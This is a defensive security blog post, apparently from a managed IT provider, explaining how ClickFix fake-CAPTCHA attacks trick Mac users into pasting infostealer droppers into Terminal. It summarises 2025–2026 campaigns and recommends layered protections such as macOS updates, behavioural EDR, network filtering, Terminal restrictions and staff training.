ClickFix on Mac: the attack that tricks your own staff into running malware

A fake CAPTCHA appears. "Verify you are human." It tells your member of staff to press Command and Space, open Terminal, and paste in a verification code. They do it. The "code" is a command, and the page copied it to their clipboard the moment they clicked. Thirty seconds later there is an infostealer running on their Mac, hoovering up saved passwords, session cookies, and anything sitting in the Keychain.

No exploit. No zero-day. No dodgy attachment that a filter should have caught. Your own employee installed it, by hand, because a website asked nicely.

This is ClickFix, and it has gone from a Windows curiosity to one of the biggest threats on the internet in about eighteen months. ESET's H1 2025 threat report clocked a 517% surge and named it the second most common attack vector behind phishing. Malwarebytes reckons it was responsible for more than half of all malware loader activity in 2025. And it is now firmly pointed at Macs.

How ClickFix works

The genius of ClickFix is that it skips the hard part of hacking. There is no software to break into. The attacker just needs the human to follow three steps.

Here is the chain on a Mac, start to finish:

1. The victim lands on a compromised site, a malicious ad, or a convincing fake. It shows a fake CAPTCHA, a "fix this error" prompt, or a "verify to continue" box.
2. They click the button. JavaScript silently copies a command to their clipboard. Microsoft documented this exact pattern across dozens of campaigns.
3. The page tells them to press Command-Space, type "Terminal", and paste. They paste a command they never read, and hit return.

What runs is usually a tiny Bash script, a dropper. It pulls the real malware down from a server into the /tmp folder, strips off Apple's quarantine flag so Gatekeeper stays quiet, and launches it with nohup so it keeps running after the Terminal window closes. The payload is almost always an infostealer. Atomic macOS Stealer, also known as AMOS, is the usual suspect.

The whole thing takes one paste. And because the command came from the user's own hands, every alarm that depends on spotting a malicious download or an unsigned app stays silent.

Why it walks past your defences

This is the part that catches people out. You can have a hardened Mac fleet and still get hit, because ClickFix targets a layer none of those controls cover.

Signature antivirus is the wrong tool. It looks for known-bad files. ClickFix hands the user a command, not a file, and the user runs it deliberately. The system treats it as a legitimate action because, technically, it is. The person chose to do it.

Notarisation and Gatekeeper do not apply. Those check apps you download and double-click. They have nothing to say about a curl command you run yourself in Terminal.

Passkeys do not save you here. This is worth sitting with, because passkeys are the right move for almost everything else, and we have argued hard for them. But Sophos put it plainly in their analysis: phishing-resistant authentication is not an effective defence against ClickFix. The attack does not phish your password. It steals the session cookies and tokens you already hold, the Keychain entries, the autofill data. A passkey protects the front door. ClickFix climbs in through a window that is already open.

Microsoft's own finding makes the scale of the problem clear: thousands of devices run ClickFix commands every month with EDR active on them. The technique works because it routes around detection, not through it.

It is a Mac problem now, not a Windows one

For a while you could half-believe ClickFix was someone else's headache, a Windows Run-dialog trick. That window has closed.

Sophos tracked three separate ClickFix campaigns aimed at macOS between November 2025 and February 2026, each delivering the MacSync infostealer. The lures tell you who they are after:

• November 2025: Google ads impersonating OpenAI's ChatGPT Atlas, hosted on legitimate-looking sites.google.com pages.
• December 2025: shared ChatGPT conversations that redirected to a fake GitHub install screen. By 22 December that campaign had logged over 29,000 clicks across its tracked domains.
• February 2026: a straight impersonation of Apple's own website.

Then in April 2026, Netskope Threat Labs caught a campaign targeting people in finance. Fake CAPTCHA, paste a "verification code" that was really a curl command, command-and-control set up under /tmp/xdivcmp/. The AppleScript stealer it dropped went after credentials from 14 browsers, 16 crypto wallets, more than 200 extensions, the macOS Keychain, saved passwords, card autofill, and password managers including 1Password and LastPass.

Notice the pattern in the bait: ChatGPT, GitHub, developer tooling, finance. These are not random consumers. They are exactly the kind of technical, busy, trusting people who work at the creative studios, agencies, and startups we look after. Someone comfortable in a terminal is more likely to paste a command without flinching, not less.

The macOS Tahoe defence Apple shipped quietly

Apple noticed. In macOS Tahoe 26.4, and on Sequoia, there is now a built-in warning that fires when you try to paste something dangerous-looking into Terminal. It blocks the paste and says:

Possible malware, Paste blocked. Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy.

It is a smart feature, placed at exactly the right moment, right before the mistake. Apple keeps the detection rules secret on purpose so attackers cannot test their way around them. Good.

But be clear-eyed about what it is. There is a "Paste Anyway" button. A user who has been told for two minutes that this step is normal and necessary will click it, because the whole con is built on manufactured urgency. Netskope confirmed the obvious: if someone ignores the warning, or runs an older macOS, the malware just carries on. And plenty of fleets are still behind on updates.

So Apple's warning is necessary. It is not sufficient. If your entire ClickFix defence is "we are on a recent macOS", you have a speed bump, not a wall.

What stops ClickFix

The attack is layered, so the defence has to be too. No single control catches it, which is precisely why the businesses that get burned are the ones relying on a single control.

Keep every Mac on 26.4 or later. This is the cheapest win available. The Terminal paste warning only exists on current macOS, so an unmanaged fleet drifting on old versions has none of it. Enforced update policies through MDM make this automatic instead of hopeful. We covered the management side in our Mac security baselines guide.

Run behavioural EDR, not just antivirus. This is the layer that sees what happens after the paste: a Bash process spawning from Terminal, fetching a binary into /tmp, stripping the quarantine flag, launching with nohup. Signatures miss it. Behavioural detection is built for exactly this sequence. It is the main reason we walked through the EDR options for Mac in detail, because this threat is what they earn their keep against.

Filter the network. The dropper has to phone home to download the real payload and set up command-and-control. DNS filtering and outbound traffic controls can cut that call before anything lands. Kill the connection and the half-finished attack dies in /tmp.

Restrict who can run Terminal at all. Most staff at a creative agency or a finance team never touch Terminal. On a managed fleet you can limit it to the people who genuinely need it. If Terminal is not there to paste into, the attack has nowhere to go.

Tell people the one rule. Every other control is technical. This one is a sentence, and it defeats the entire technique: never paste a command into Terminal because a website told you to. No legitimate CAPTCHA, no real error fix, no genuine verification will ever ask you to do that. Say it once, clearly, and you have inoculated most of your team for free.

None of these is hard. The problem is that almost nobody has all five, and ClickFix is built to slip through whichever one you are missing.

How we handle this for clients

We deploy this as a stack, not a checklist someone gets round to. Enforced macOS updates so the paste warning is always live. Behavioural EDR watching for the post-paste pattern. DNS and outbound filtering to break command-and-control. Terminal locked down to the people who need it. And the staff message delivered as part of onboarding, not buried in a policy PDF nobody opens.

We are honest that no setup is bulletproof against an attack that targets human judgement. A determined, well-built lure aimed at a tired person will sometimes work. The goal is not perfection. It is to make sure that when one paste slips through, the next four layers catch it before any data leaves the building.

If you are not sure how exposed your Macs are to this, that is the conversation to have. Book a free audit and we will look at your update posture, your endpoint security, and your network controls, then tell you where the gaps are, even the ones we are not the right people to fix.

Frequently asked questions

What is a ClickFix attack? ClickFix is a social engineering technique that tricks a user into running a malicious command on their own device. A fake CAPTCHA, error message, or verification page tells the victim to open Terminal on a Mac, or the Run dialog on Windows, and paste in a command the page has usually copied to their clipboard automatically. Running it downloads and installs malware, most often an infostealer. ESET's H1 2025 report recorded a 517% surge and ranked it second only to phishing. It exploits the person, not the software.

Does macOS protect against ClickFix? Partly, and only on recent versions. macOS Tahoe 26.4 and Sequoia added a warning that blocks a dangerous-looking paste into Terminal with the message "Possible malware, Paste blocked." It is a real improvement, but it can be dismissed with a "Paste Anyway" button and does nothing on older macOS. Treat it as one layer, not the whole defence.

Does ClickFix work on Mac or just Windows? Both. It started on Windows and moved to Mac fast. Sophos documented three macOS campaigns between November 2025 and February 2026 using fake ChatGPT, GitHub, and Apple lures to deliver the MacSync infostealer. In April 2026 Netskope found a campaign targeting finance-sector users with an AppleScript stealer that harvested credentials from 14 browsers, 16 crypto wallets, the Keychain, and password managers including 1Password and LastPass.

Do passkeys or antivirus stop ClickFix? Not on their own. Signature antivirus struggles because the user runs the command manually, so it looks legitimate. Notarisation does not apply to a command typed into Terminal. And Sophos is blunt that phishing-resistant authentication like passkeys is not an effective defence, because ClickFix steals session cookies and data rather than passwords. What helps is behavioural EDR, network filtering, staff awareness, and staying on macOS 26.4 or later.

What should a UK business do about ClickFix? Keep every Mac on macOS Tahoe 26.4 or later so the paste warning is active. Run behavioural EDR that watches for the post-paste behaviour. Filter DNS and outbound traffic so the dropper cannot reach its command-and-control server. Tell staff never to paste a command into Terminal because a web page told them to. And on a managed fleet, restrict who can run Terminal at all. We deploy this layered setup as standard.